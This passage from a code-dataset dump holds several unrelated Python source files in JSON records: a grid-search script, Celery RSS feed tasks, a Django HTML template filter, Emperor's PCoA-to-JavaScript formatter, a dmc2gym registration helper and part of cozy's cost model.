Grid-search parameters\nparam_test = {\n\n}\n\ngsearch = GridSearchCV(\n    estimator=model,\n    param_grid=param_test,\n    scoring='roc_auc',\n    iid=False,\n    cv=5,\n    n_jobs=-1,\n)\n\nprint('Searching...')\ngsearch.fit(train_df[predictors], train_df[target])\n\n# Print the search results\nprint('\\nCurrent grid-search parameters:\\n', param_test)\nprint('\\ngsearch.best_params_:', gsearch.best_params_,)\nprint('\\ngsearch.best_score_:', gsearch.best_score_, )\n\n# --------------- END grid search ----------------\n\ntime_spend = time.time() - time_begin\nprint('\\nRunning time: %d seconds, about %d minutes\\n' % (time_spend, time_spend // 60))\n","sub_path":"src/models_use_data_4/rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92107292","text":"import datetime\nfrom celery.task import Task\nfrom utils import log as logging\nfrom django.conf import settings\n\nclass TaskFeeds(Task):\n    name = 'task-feeds'\n\n    def run(self, **kwargs):\n        from apps.rss_feeds.models import Feed \n        settings.LOG_TO_STREAM = True\n        now = datetime.datetime.utcnow()\n        \n        # Active feeds\n        feeds = Feed.objects.filter(\n            next_scheduled_update__lte=now,\n            active=True\n        ).exclude(\n            active_subscribers=0\n        ).order_by('?')\n        Feed.task_feeds(feeds)\n        \n        # Mistakenly inactive feeds\n        day = now - datetime.timedelta(days=1)\n        feeds = Feed.objects.filter(\n            last_update__lte=day, \n            queued_date__lte=day,\n            min_to_decay__lte=60*24,\n            active_subscribers__gte=1\n        ).order_by('?')[:20]\n        if feeds: Feed.task_feeds(feeds)\n        \n        week = now - datetime.timedelta(days=7)\n        feeds = Feed.objects.filter(\n            last_update__lte=week, \n            queued_date__lte=day,\n            active_subscribers__gte=1\n        ).order_by('?')[:20]\n        if feeds: Feed.task_feeds(feeds)\n\n    \nclass UpdateFeeds(Task):\n    name = 'update-feeds'\n    max_retries = 0\n    ignore_result = True\n\n    def run(self, feed_pks, **kwargs):\n        from apps.rss_feeds.models import Feed\n        from apps.statistics.models import MStatistics\n        \n        mongodb_replication_lag = int(MStatistics.get('mongodb_replication_lag', 0))\n        compute_scores = bool(mongodb_replication_lag < 60)\n        \n        options = {\n            'fake': bool(MStatistics.get('fake_fetch')),\n            'quick': float(MStatistics.get('quick_fetch', 0)),\n            'compute_scores': compute_scores,\n            'mongodb_replication_lag': mongodb_replication_lag,\n        }\n        \n        if not isinstance(feed_pks, list):\n            feed_pks = [feed_pks]\n        \n        for feed_pk in feed_pks:\n            try:\n                feed = Feed.objects.get(pk=feed_pk)\n                feed.update(**options)\n            except Feed.DoesNotExist:\n                logging.info(\" ---> Feed doesn't exist: [%s]\" % feed_pk)\n            # logging.debug('   Updating: [%s] %s' % (feed_pks, feed))\n\nclass NewFeeds(Task):\n    name = 'new-feeds'\n    max_retries = 0\n    ignore_result = True\n\n    def run(self, feed_pks, **kwargs):\n        from apps.rss_feeds.models import Feed\n        if not isinstance(feed_pks, list):\n            feed_pks = [feed_pks]\n        \n        options = {\n            'force': True,\n        }\n        for feed_pk in feed_pks:\n            feed = Feed.objects.get(pk=feed_pk)\n            feed.update(options=options)\n\nclass PushFeeds(Task):\n    name = 'push-feeds'\n    max_retries = 0\n    ignore_result = 
True\n\n def run(self, feed_id, xml, **kwargs):\n from apps.rss_feeds.models import Feed\n from apps.statistics.models import MStatistics\n \n mongodb_replication_lag = int(MStatistics.get('mongodb_replication_lag', 0))\n compute_scores = bool(mongodb_replication_lag < 60)\n \n options = {\n 'feed_xml': xml,\n 'compute_scores': compute_scores,\n 'mongodb_replication_lag': mongodb_replication_lag,\n }\n feed = Feed.objects.get(pk=feed_id)\n feed.update(options=options)\n","sub_path":"apps/rss_feeds/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409996751","text":"from django import template\nfrom django.template import Context\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.template.loader import render_to_string, select_template\nimport django.dispatch\nfrom django.db.models import Model\n\nregister = template.Library()\ntemplate_chosen = django.dispatch.Signal(providing_args=[\"obj\", \"template\"])\ncontext_populated = django.dispatch.Signal(providing_args=[\"obj\", \"context\"])\n\nimport logging\nlogging.getLogger().setLevel(logging.DEBUG)\n\ndef _iterate_names(obj, names):\n \"\"\"\n Inspect an object for a value that might have multiple names.\n \"\"\"\n default_value = None\n for name in names:\n if hasattr(obj, name):\n return getattr(obj, name)\n return default_value\n\ndef _select_helper_template(obj, template_kind):\n \"\"\"\n Generate a list of possible template names, and then select the right one.\n \n The names it tries are:\n \n - [obj.template].html \n - [app_label]_[model]_[id]_[template_kind].html\n - [app_label]_[model]_[template_kind].html\n - [model]_[id]_[template_kind].html\n - [model]_[template_kind].html\n - [class]_[id]_[template_kind].html\n - [class]_[template_kind].html \n - [template_kind].html\n \"\"\"\n # 1.0 Determine the template\n template_names = []\n\n # Could be hard coded\n if hasattr(obj, 'template_name'):\n template_names.append(getattr(obj, 'template_name'))\n\n # Could be a django model\n if isinstance(obj, Model):\n content_type = ContentType.objects.get_for_model(obj)\n # [app_label]_[model]_[id]_[template_kind].html\n template_names.append(\"%s_%s_%s_%s.html\" % (content_type.app_label, content_type.model, obj.id, template_kind))\n # [app_label]_[model]_[template_kind].html\n template_names.append(\"%s_%s_%s.html\" % (content_type.app_label, content_type.model, template_kind))\n # [model]_[id]_[template_kind].html\n template_names.append(\"%s_%s_%s.html\" % (content_type.model, obj.id, template_kind))\n # [model]_[template_kind].html\n template_names.append(\"%s_%s.html\" % (content_type.model, template_kind))\n else: \n # By class and ID \n class_name = obj.__class__.__name__.lower()\n if hasattr(obj, 'id'):\n # [class]_[id]_[template_kind].html\n template_names.append('%s_%s_%s.html' % (class_name, getattr(obj, 'id'), template_kind))\n # [class]_[template_kind].html \n template_names.append(\"%s_%s.html\" % (class_name, template_kind))\n\n # Fallback template - [template_kind].html\n template_names.append('makehtml/%s.html' % template_kind)\n template = select_template(template_names)\n template_chosen.send(sender=None, obj=obj, template_chosen=template)\n return template\n\ndef _populate_context(obj, context):\n \"\"\"\n Populate the context with common elements\n \"\"\"\n context['title'] = _iterate_names(obj, ['title', 'name', 'headline'])\n context['body'] = _iterate_names(obj, 
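# candidate attribute names for the main body text, first match wins\n        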
['body', 'content', 'text', 'note', 'description', 'long_description', 'message', 'question', 'choice'])\n context['summary'] = _iterate_names(obj, ['summary', 'excerpt', 'short_description']) \n context['first_name'] = _iterate_names(obj, ['first_name', 'firstname'])\n context['last_name'] = _iterate_names(obj, ['last_name', 'lastname'])\n context['sub_title'] = _iterate_names(obj, ['sub_title', 'subtitle'])\n context['author'] = _iterate_names(obj, ['author', 'creator'])\n context['email'] = _iterate_names(obj, ['email'])\n context['pub_date'] = _iterate_names(obj, ['pub_date', 'timestamp', 'publish_on', 'published_on', 'creation_date', 'date_added'])\n context['thumbnail'] = _iterate_names(obj, ['thumbnail', 'thumbnail_url'])\n context['mp3_url'] = _iterate_names(obj, ['mp3_url', 'podcast_url']) \n context['categories'] = _iterate_names(obj, ['categories', 'category', 'category_set'])\n context['is_public'] = _iterate_names(obj, ['is_public', 'published'])\n context['obj'] = obj\n # TODOs:\n # URLs\n # Event: start/stop\n return context\n\n@register.filter(name='html')\ndef html(value, htmltype='summary'):\n \"\"\"Introspect an object to create HTML.\"\"\"\n template = _select_helper_template(value, htmltype)\n context = _populate_context(value, Context())\n\n context_populated.send(sender=None, obj=value, context=context)\n logging.debug(\"Made HTML '%s'\" % htmltype)\n \n return template.render(context)\n \n","sub_path":"makehtml/templatetags/makehtml.py","file_name":"makehtml.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41926120","text":"#!/usr/bin/env python\n# File created on 24 Jan 2013\nfrom __future__ import division\n\n__author__ = \"Antonio Gonzalez Pena\"\n__copyright__ = \"Copyright 2013, The Emperor Project\"\n__credits__ = [\"Meg Pirrung\", \"Antonio Gonzalez Pena\", \"Yoshiki Vazquez Baeza\"]\n__license__ = \"BSD\"\n__version__ = \"0.9.51-dev\"\n__maintainer__ = \"Yoshiki Vazquez Baeza\"\n__email__ = \"yoshiki89@gmail.com\"\n__status__ = \"Development\"\n\n\nfrom sys import argv\nfrom copy import deepcopy\nfrom os.path import abspath\nfrom datetime import datetime\nfrom StringIO import StringIO\nfrom socket import gethostname\n\nfrom numpy import max, min, abs, argsort, array\n\nfrom emperor.util import (keep_columns_from_mapping_file,\n get_emperor_library_version)\n\nfrom emperor.qiime_backports.format import format_mapping_file\nfrom emperor.qiime_backports.parse import (mapping_file_to_dict,\n parse_mapping_file)\nfrom emperor.qiime_backports.filter import (\n filter_mapping_file_by_metadata_states,sample_ids_from_metadata_description)\nfrom emperor.qiime_backports.util import MetadataMap\nfrom emperor.qiime_backports import __version__ as qiime_backports_version\n\nclass EmperorLogicError(ValueError):\n \"\"\"Exception raised when a requirement for the Emperor GUI is not met\"\"\"\n pass\n\ndef format_pcoa_to_js(header, coords, eigvals, pct_var, custom_axes=[],\n coords_low=None, coords_high=None, number_of_axes=10,\n number_of_segments=8):\n \"\"\"Write the javascript necessary to represent a pcoa file in emperor\n\n Inputs:\n header: sample names for the pcoa file 1-D array\n coords: coordinates of the PCoA file, 2-D array\n eigvals: eigen-values of the PCoA file, 1-D array\n pct_var: percentage of variation of the PCoA file, 1-D array\n custom_axes: list of category names for the custom axes\n coords_low: coordinates representing the lower edges of an ellipse\n 
coords_high: coordinates representing the higher edges of an ellipse\n    number_of_axes: number of axes to be returned\n    number_of_segments: number of segments and rings for each sphere\n\n    Output:\n    string: javascript representation of the input PCoA data, contains a list\n    of spheres, list of ellipses (if coords_low and coords_high are present) and\n    several setup variables.\n\n    Formats the output of qiime.parse.parse_coords_file into javascript variable\n    declarations.\n    \"\"\"\n    js_pcoa_string = ''\n\n    # validating that the number of coords in coords\n    if number_of_axes>len(coords[0]):\n        number_of_axes = len(coords[0])\n\n    # validating that all the axes are above 0.01%, this accounts for really\n    # small variations explained in some axes that end up being not practical\n    # as the GUI has some problems when presenting those values on screen\n    valid_pcoalabels = len([i for i in pct_var if i>0.01])\n    if number_of_axes>valid_pcoalabels:\n        number_of_axes = valid_pcoalabels\n    if number_of_axes < 3:\n        raise EmperorLogicError(\"Due to the variation explained, Emperor \"\n                                \"could not plot at least 3 axes, check the \"\n                                \"input files to ensure that the percent \"\n                                \"explained is greater than 0.01 in at least \"\n                                \"three axes.\")\n\n    # ranges for the PCoA space\n    max_x = max(coords[:,0:1])\n    max_y = max(coords[:,1:2])\n    max_z = max(coords[:,2:3])\n    min_x = min(coords[:,0:1])\n    min_y = min(coords[:,1:2])\n    min_z = min(coords[:,2:3])\n    maximum = max(abs(coords[:,:number_of_axes]))\n    pcoalabels = pct_var[:number_of_axes]\n\n    radius = (max_x-min_x)*.012\n\n    # write the values for all the spheres\n    js_pcoa_string += '\\nvar g_spherePositions = new Array();\\n'\n    for point, coord in zip(header, coords):\n        all_coords = ', '.join([\"'P%d': %f\" % (i+1,coord[i]) for i in range(number_of_axes)])\n        js_pcoa_string += (\"g_spherePositions['%s'] = { 'name': '%s', 'color': \"\n            \"0, 'x': %f, 'y': %f, 'z': %f, %s };\\n\" % (point, point, coord[0],\n            coord[1],coord[2], all_coords))\n\n    # write the values for all the ellipses\n    js_pcoa_string += '\\nvar g_ellipsesDimensions = new Array();\\n'\n    if coords_low is not None and coords_high is not None:\n        for s_header, s_coord, s_low, s_high in zip(header, coords, coords_low,\n            coords_high):\n            delta = abs(s_high-s_low)\n            all_coords = ', '.join([\"'P%d': %f\" % (i+1,s_coord[i]) for i in range(number_of_axes)])\n            js_pcoa_string += (\"g_ellipsesDimensions['%s'] = { 'name': '%s', \"\n                \"'color': 0, 'width': %f, 'height': %f, 'length': %f , 'x': %f,\"\n                \" 'y': %f, 'z': %f, %s }\\n\" % (s_header, s_header,delta[0], delta[1],\n                delta[2], s_coord[0], s_coord[1], s_coord[2], all_coords))\n\n    js_pcoa_string += 'var g_segments = %d, g_rings = %d, g_radius = %f;\\n' % (number_of_segments,\n        number_of_segments, radius)\n    js_pcoa_string += 'var g_xAxisLength = %f;\\n' % (abs(max_x)+abs(min_x))\n    js_pcoa_string += 'var g_yAxisLength = %f;\\n' % (abs(max_y)+abs(min_y))\n    js_pcoa_string += 'var g_zAxisLength = %f;\\n' % (abs(max_z)+abs(min_z))\n    js_pcoa_string += 'var g_xMaximumValue = %f;\\n' % (max_x)\n    js_pcoa_string += 'var g_yMaximumValue = %f;\\n' % (max_y)\n    js_pcoa_string += 'var g_zMaximumValue = %f;\\n' % (max_z)\n    js_pcoa_string += 'var g_xMinimumValue = %f;\\n' % (min_x)\n    js_pcoa_string += 'var g_yMinimumValue = %f;\\n' % (min_y)\n    js_pcoa_string += 'var g_zMinimumValue = %f;\\n' % (min_z)\n    js_pcoa_string += 'var g_maximum = %f;\\n' % maximum\n\n    offset = 0\n\n    # create three vars, pc1, pc2 and pc3 if no custom_axes are passed, then use\n    # the values of the percent explained by the PCoA; if custom_axes are passed\n    # use as many as you can (since custom axes can be either [0, 1, 2, 3])\n    for i in range(0, 3):\n        try:\n            js_pcoa_string += 'var g_pc%dLabel = \\\"%s\\\";\\n' % (i+1,\n                custom_axes[i])\n            offset+=1 # offset will help us retrieve the correct pcoalabels val\n        except:\n            # if there are custom axes then subtract the number of custom axes\n            js_pcoa_string += 'var g_pc%dLabel = \\\"PC%d (%.2f %%)\\\";\\n' %\\\n                (i+1, i+1-offset, pcoalabels[i-offset])\n    js_pcoa_string += 'var g_number_of_custom_axes = %d;\\n' % offset\n\n    js_pcts = []\n    js_pcts_round = []\n    if custom_axes == None: custom_axes = []\n    for element in custom_axes + list(pct_var[:number_of_axes]):\n        try:\n            # scale the percent so it's a number from 0 to 1\n            js_pcts.append('%f' % (float(element)/100))\n            js_pcts_round.append('%.2f' % (element))\n        except ValueError:\n            js_pcts.append('%f' % (float(pct_var[0]/100)))\n            js_pcts_round.append('%.2f' % (pct_var[0]))\n    js_pcoa_string += 'var g_fractionExplained = [%s];\\n' % ', '.join(js_pcts)\n    js_pcoa_string += 'var g_fractionExplainedRounded = [%s];\\n' % ', '.join(js_pcts_round)\n\n    return js_pcoa_string\n\ndef format_mapping_file_to_js(mapping_file_data, mapping_file_headers, columns):\n    \"\"\"Write a javascript representation of the mapping file\n\n    Inputs:\n    mapping_file_data: contents of the mapping file\n    mapping_file_headers: headers of the mapping file\n    columns: valid columns to use, usually a subset of mapping_file_headers\n\n    Outputs:\n    string: javascript representation of the mapping file\n    \"\"\"\n    js_mapping_file_string = ''\n\n    mapping_file_dict = mapping_file_to_dict(mapping_file_data,\n        mapping_file_headers)\n\n    map_values = []\n    for k,v in mapping_file_dict.items():\n        if 'SampleID' in columns:\n            vals = [\"'%s'\" % k] + [\"'%s'\" % v[col]\\\n                for col in mapping_file_headers[1:]]\n        else:\n            vals = [\"'%s'\" % v[col] for col in mapping_file_headers[1:]]\n        map_values.append(\"'%s': [%s]\" % (k, ','.join(vals)))\n\n    if 'SampleID' not in columns:\n        mapping_file_headers = mapping_file_headers[1:]\n\n    # format the mapping file as javascript objects\n    js_mapping_file_string += 'var g_mappingFileHeaders = [%s];\\n' % ','.join(\n        [\"'%s'\" % col for col in mapping_file_headers])\n    js_mapping_file_string += 'var g_mappingFileData = { %s };\\n' % ','.join(\n        map_values)\n\n    map_object = MetadataMap(mapping_file_dict, [])\n    # make sure the comparison for SampleID is made first because otherwise\n    # if the metadata map tries to check 'SampleID' it will raise an exception\n    animatable_categories = [category for category in columns\\\n        if category != 'SampleID' and map_object.isNumericCategory(category)]\n    js_mapping_file_string += 'var g_animatableMappingFileHeaders = [%s];\\n' %\\\n        ','.join([\"'%s'\" % col for col in animatable_categories])\n\n    return js_mapping_file_string\n\ndef format_taxa_to_js(otu_coords, lineages, prevalence, min_taxon_radius=0.5,\n                    max_taxon_radius=5, radius=1.0):\n    \"\"\"Write a string representing the taxa in a PCoA plot as javascript\n\n    Inputs:\n    otu_coords: numpy array where the taxa is positioned\n    lineages: label for each of these lineages\n    prevalence: score of prevalence for each of the taxa that is drawn\n\n    *These parameters should work more as constants and once we find out that\n    there's a value that is too big to be presented, the proper checks should\n    be put into place. Currently we haven't found such cases in any study*\n    min_taxon_radius: minimum value for the radius of the spheres on the plot\n    max_taxon_radius: maximum value for the radius of the spheres on the plot\n    radius: default value size\n\n    Outputs:\n    js_biplots_string: javascript string where the taxa information is written\n    to create the spheres representing each of these, will return only the\n    variable declaration if the inputs are empty.\n    \"\"\"\n    js_biplots_string = []\n    js_biplots_string.append('\\nvar g_taxaPositions = new Array();\\n')\n\n    # if we have prevalence scores, calculate the taxa radii values\n    if len(prevalence):\n        taxa_radii = radius*(min_taxon_radius+(max_taxon_radius-\n            min_taxon_radius)*prevalence)\n    else:\n        taxa_radii = []\n\n    index = 0\n\n    # write the data in the form of a dictionary\n    for taxa_label, taxa_coord, t_radius in zip(lineages,otu_coords,taxa_radii):\n        js_biplots_string.append((\"g_taxaPositions['%d'] = { 'lineage': '%s', \"\n            \"'x': %f, 'y': %f, 'z': %f, 'radius': %f};\\n\") % (index,\n            taxa_label, taxa_coord[0], taxa_coord[1], taxa_coord[2], t_radius))\n        index += 1\n    js_biplots_string.append('\\n')\n    # join the array of strings as a single string\n    return ''.join(js_biplots_string)\n\ndef format_vectors_to_js(mapping_file_data, mapping_file_headers, coords_data,\n                        coords_headers, connected_by_header,\n                        sorted_by_header=None):\n    \"\"\"Write a string representing the vectors in a PCoA plot as javascript\n\n    Inputs:\n    mapping_file_data: contents of the mapping file\n    mapping_file_headers: headers of the mapping file\n    coords_data: coordinates of the PCoA plot in a numpy 2-D array or a list of\n    numpy 2-D arrays for jackknifed input\n    coords_headers: headers of the coords in the PCoA plot or a list of lists\n    with the headers for jackknifed input\n    connected_by_header: header of the mapping file that represents how the\n    lines will be connected\n    sorted_by_header: numeric-only header name to sort the samples in the\n    vectors\n\n    Output:\n    js_vectors_string: string that represents the vectors in the shape of a\n    javascript object\n\n    Notes:\n    If using jackknifed input, the coordinates and headers that will be used are\n    the ones belonging to the master coords i. e. the first element.\n    \"\"\"\n\n    js_vectors_string = []\n    js_vectors_string.append('\\nvar g_vectorPositions = new Array();\\n')\n\n    if connected_by_header != None:\n        # check if we are processing jackknifed input, if so just get the master\n        if type(coords_data) == list:\n            coords_data = coords_data[0]\n            coords_headers = coords_headers[0]\n\n        columns_to_keep = ['SampleID', connected_by_header]\n\n        # do not add None if sorted_by_header is None or empty\n        if sorted_by_header:\n            columns_to_keep.append(sorted_by_header)\n\n        # reduce the amount of data by keeping the required fields only\n        mapping_file_data, mapping_file_headers =\\\n            keep_columns_from_mapping_file(mapping_file_data,\n                mapping_file_headers, columns_to_keep)\n\n        # format the mapping file to use this with the filtering function\n        mf_string = format_mapping_file(mapping_file_headers, mapping_file_data)\n\n        index = mapping_file_headers.index(connected_by_header)\n        connected_by = list(set([line[index] for line in mapping_file_data]))\n\n        for category in connected_by:\n            # convert to StringIO for each iteration; else the object\n            # won't be usable after the first iteration & you'll get an error\n            sample_ids = sample_ids_from_metadata_description(\n                StringIO(mf_string),'%s:%s' % (connected_by_header,category))\n\n            # if there is a sorting header, sort the coords using these values\n            if sorted_by_header:\n                sorting_index = mapping_file_headers.index(sorted_by_header)\n                to_sort = [line for line in mapping_file_data if line[0] in\\\n                    sample_ids]\n\n                # get the sorted sample ids from the sorted-reduced mapping file\n                sample_ids = zip(*sorted(to_sort,\n                    key=lambda x: float(x[sorting_index])))[0]\n\n            # each category value is a new vector\n            js_vectors_string.append(\"g_vectorPositions['%s'] = new Array();\\n\"\n                % (category))\n\n            for s in sample_ids:\n                index = coords_headers.index(s)\n\n                # print the first three elements of each coord for each sample\n                js_vectors_string.append(\"g_vectorPositions['%s']['%s'] = %s;\\n\"\n                    % (category, s, coords_data[index, :3].tolist()))\n\n    return ''.join(js_vectors_string)\n\ndef format_comparison_bars_to_js(coords_data, coords_headers, clones,\n                                is_serial_comparison=True):\n    \"\"\"Format coordinates data to create a comparison plot\n\n    Inputs:\n    coords_data: numpy array with the replicated coordinates\n    coords_headers: list with the headers for each of the replicated coordinates\n    clones: number of replicates in the coords_data and coords_headers\n    is_serial_comparison: whether the samples will be connected one after the\n    other (True) or all will originate in the first set of coordinates.\n\n    Outputs:\n    Javascript object that contains the data for the comparison plot\n\n    Raises:\n    AssertionError if the coords_data and coords_headers don't have the same\n    length.\n    AssertionError if the number of clones doesn't concord with the samples\n    being presented.\n\n    Unless the value of clones is > 0 this function will return an empty\n    javascript object initialization.\n    \"\"\"\n\n    js_comparison_string = []\n    js_comparison_string.append('\\nvar g_comparisonPositions = new Array();\\n')\n\n    if is_serial_comparison:\n        js_comparison_string.append('var g_isSerialComparisonPlot = true;\\n')\n    else:\n        js_comparison_string.append('var g_isSerialComparisonPlot = false;\\n')\n\n    if clones:\n        headers_length = len(coords_headers)\n\n        # assert some sanity checks\n        assert headers_length == len(coords_data), \"The coords data and\"+\\\n            \"the coords headers must have the same length\"\n        assert headers_length%clones == 0, \"There has to 
be an exact \"+\\\n            \"number of clones of the data\"\n\n        # get the indices that the sample names get sorted by, this will group\n        # all the samples with the same prefix together, and since the suffixes\n        # are numeric, the samples will be one after the other i. e. sample_0,\n        # sample_1, sample_2 and other_0, other_1, other_2 and so on. With these\n        # indices sort the coordinates and then the headers themselves, though\n        # convert to a numpy array first & back to a list to avoid sorting again\n        indices = argsort(coords_headers)\n        coords_data = coords_data[indices, :]\n        coords_headers = array(coords_headers)[indices].tolist()\n\n        # in steps of the number of clones iterate through the headers and the\n        # coords to create the javascript object with the coordinates\n        for index in xrange(0, headers_length, clones):\n            # 1st object must have _0 as a suffix, trim it to reveal the sample id\n            assert coords_headers[index].endswith('_0'), \"There's an internal\"+\\\n                \" inconsistency with the sample ids\"\n            sample_id = coords_headers[index][:-2]\n\n            # convert all elements in the numpy array into a string before\n            # formatting the elements into the javascript dictionary object\n            js_comparison_string.append(\"g_comparisonPositions['%s'] = [%s];\\n\"%\n                (sample_id, str(', '.join(map(str,\n                coords_data[index:(index+clones), 0:3].tolist())))))\n    return ''.join(js_comparison_string)\n\n\ndef format_emperor_html_footer_string(has_biplots=False, has_ellipses=False,\n                                    has_vectors=False, has_edges=False):\n    \"\"\"Create an HTML footer according to the things being presented in the plot\n\n    has_biplots: whether the plot has biplots or not\n    has_ellipses: whether the plot has ellipses or not\n    has_vectors: whether the plot has vectors or not\n    has_edges: whether the plot has edges between samples (comparison plot)\n\n\n    This function will remove unnecessary GUI elements from index.html to avoid\n    confusions i. e. showing an ellipse opacity slider when there are no\n    ellipses in the plot.\n    \"\"\"\n    optional_strings = []\n\n    # we use python's built-in ternary operator to add or not a string\n    # see _EMPEROR_FOOTER_HTML_STRING\n    format_dict = {'biplot_spheres_color_selector':\n                        _BIPLOT_SPHERES_COLOR_SELECTOR if has_biplots else '',\n                    'biplot_visibility_selector':\n                        _BIPLOT_VISIBILITY_SELECTOR if has_biplots else '',\n                    'taxa_labels_selector':\n                        _TAXA_LABELS_SELECTOR if has_biplots else '',\n                    'taxa_labels_color_selector':\n                        _TAXA_LABELS_COLOR_SELECTOR if has_biplots else '',\n                    'edges_color_selector':\n                        _EDGES_COLOR_SELECTOR if has_edges else '',\n                    'ellipse_opacity_slider':\n                        _ELLIPSE_OPACITY_SLIDER if has_ellipses else '',\n                    'vectors_opacity_slider':\n                        _VECTORS_OPACITY_SLIDER if has_vectors else '',\n                    'edges_visibility_selector':\n                        _EDGES_VISIBILITY_SELECTOR if has_edges else ''}\n\n    return _EMPEROR_FOOTER_HTML_STRING.format(**format_dict)\n\ndef format_emperor_autograph(metadata_fp, coords_fp, language='HTML'):\n    \"\"\"Create a signature with some meta-data of the Emperor package\n\n    language: language to which it will be formatted as a multi-line comment\n\n    \"\"\"\n\n    # supported open and closing of multi-line comments for different languages\n    _languages = {'HTML':('<!--', '-->'), 'Python':('\"\"\"', '\"\"\"'), 'C':('/*',\n        '*/'), 'Bash':('<<COMMENT', 'COMMENT')}\n\n    [... the remainder of format_emperor_autograph, the _*_SELECTOR and _*_SLIDER snippet constants, and the body of the _EMPEROR_FOOTER_HTML_STRING template were lost when the HTML markup was stripped during extraction; only stray text nodes survive (the 'Emperor' logo alt text; labels such as 'Axes Labels Color', 'Axes Color', 'Background Color', 'Samples Label Visibility', 'Scale coords by percent explained', 'Filename (only letters, numbers, ., - and _):', 'Create legend', \"For a PNG, simply press 'ctrl+p'.\") together with the format placeholders {biplot_spheres_color_selector}, {biplot_visibility_selector}, {taxa_labels_selector}, {taxa_labels_color_selector}, {edges_color_selector}, {ellipse_opacity_slider}, {vectors_opacity_slider}, {edges_visibility_selector}; the closing triple quote below ends the template ...]
\n\n\n\n\"\"\"\n","sub_path":"emperor/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":38863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"638528669","text":"import gym\nfrom gym.envs.registration import register\n\n\ndef make(\n domain_name,\n task_name,\n resource_files,\n img_source,\n total_frames,\n seed=1,\n visualize_reward=True,\n from_pixels=False,\n height=84,\n width=84,\n camera_id=0,\n frame_skip=1,\n episode_length=1000,\n frame_stack=1,\n environment_kwargs=None,\n extra='train',\n):\n env_id = 'dmc_%s_%s_%s_%s_-v1' % (domain_name, task_name, extra, seed)\n\n if from_pixels:\n assert not visualize_reward,\\\n 'cannot use visualize reward when learning from pixels'\n\n # shorten episode length\n max_episode_steps = (episode_length + frame_skip - 1) // frame_skip\n\n if env_id not in gym.envs.registry.env_specs:\n register(\n id=env_id,\n entry_point='noisy_bg.envs.dmc2gym.wrappers:DMCWrapper',\n kwargs={\n 'domain_name': domain_name,\n 'task_name': task_name,\n 'resource_files': resource_files,\n 'img_source': img_source,\n 'total_frames': total_frames,\n 'task_kwargs': {\n 'random': seed\n },\n 'environment_kwargs': environment_kwargs,\n 'visualize_reward': visualize_reward,\n 'from_pixels': from_pixels,\n 'height': height,\n 'width': width,\n 'camera_id': camera_id,\n 'frame_skip': frame_skip,\n 'frame_stack': frame_stack,\n },\n max_episode_steps=max_episode_steps\n )\n return gym.make(env_id)\n","sub_path":"noisy_bg/envs/dmc2gym/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"608276576","text":"from collections import OrderedDict\nfrom functools import total_ordering, lru_cache\nimport itertools\n\nfrom cozy.common import typechecked, partition, make_random_access\nfrom cozy.target_syntax import *\nfrom cozy.syntax_tools import BottomUpExplorer, pprint, equal, fresh_var, mk_lambda, free_vars, subst, alpha_equivalent, all_exps, cse\nfrom cozy.typecheck import is_collection\nfrom cozy.pools import RUNTIME_POOL, STATE_POOL\nfrom cozy.solver import valid, satisfiable, REAL, SolverReportedUnknown, IncrementalSolver\nfrom cozy.evaluation import eval\nfrom cozy.opts import Option\n\nassume_large_cardinalities = Option(\"assume-large-cardinalities\", int, 1000)\ninteger_cardinalities = Option(\"try-integer-cardinalities\", bool, True)\n\n# In principle these settings are supposed to improve performance; in practice,\n# they do not.\nincremental = False\nuse_indicators = False\n\nclass Cost(object):\n WORSE = \"worse\"\n BETTER = \"better\"\n UNORDERED = \"unordered\"\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n raise NotImplementedError()\n\nclass CostModel(object):\n def cost(self, e, pool):\n raise NotImplementedError()\n def is_monotonic(self):\n raise NotImplementedError()\n\n# -----------------------------------------------------------------------------\n\nclass SymbolicCost(Cost):\n @typechecked\n def __init__(self, formula : Exp, cardinalities : { Exp : EVar }):\n self.formula = formula\n self.cardinalities = cardinalities\n def __repr__(self):\n return \"SymbolicCost({!r}, {!r})\".format(self.formula, self.cardinalities)\n def __str__(self):\n return pprint(self.formula)\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n assert isinstance(other, SymbolicCost)\n if False:\n 
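# dead code: IncrementalSolver-based comparison kept for reference; the live path is in the else branch below\n            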
s = IncrementalSolver()\n v1, v2 = fresh_var(BOOL), fresh_var(BOOL)\n s.add_assumption(EAll([\n self.order_cardinalities(other, assumptions, solver),\n EEq(v1, EBinOp(self.formula, \"<=\", other.formula).with_type(BOOL)),\n EEq(v2, EBinOp(other.formula, \"<=\", self.formula).with_type(BOOL))]))\n o1 = s.valid(v1)\n o2 = s.valid(v2)\n else:\n cards = self.order_cardinalities(other, assumptions, solver)\n o1 = self.always(\"<=\", other, cards=cards)\n o2 = other.always(\"<=\", self, cards=cards)\n if o1 and not o2:\n return Cost.BETTER\n elif o2 and not o1:\n return Cost.WORSE\n else:\n return Cost.UNORDERED\n def order_cardinalities(self, other, assumptions : Exp = T, solver : IncrementalSolver = None) -> Exp:\n if solver is None:\n solver = IncrementalSolver()\n if incremental:\n solver.push()\n solver.add_assumption(assumptions)\n\n cardinalities = OrderedDict()\n for m in (self.cardinalities, other.cardinalities):\n for k, v in m.items():\n cardinalities[v] = k\n\n conds = []\n res = []\n for (v1, c1) in cardinalities.items():\n res.append(EBinOp(v1, \">=\", ZERO).with_type(BOOL))\n for (v2, c2) in cardinalities.items():\n if v1 == v2:\n continue\n if alpha_equivalent(c1, c2):\n res.append(EEq(v1, v2))\n continue\n\n if incremental and use_indicators:\n conds.append((v1, v2, fresh_var(BOOL), cardinality_le(c1, c2, as_f=True)))\n else:\n if incremental:\n le = cardinality_le(c1, c2, solver=solver)\n else:\n # print(\"CMP {}: {} / {}\".format(\"<-\" if v1 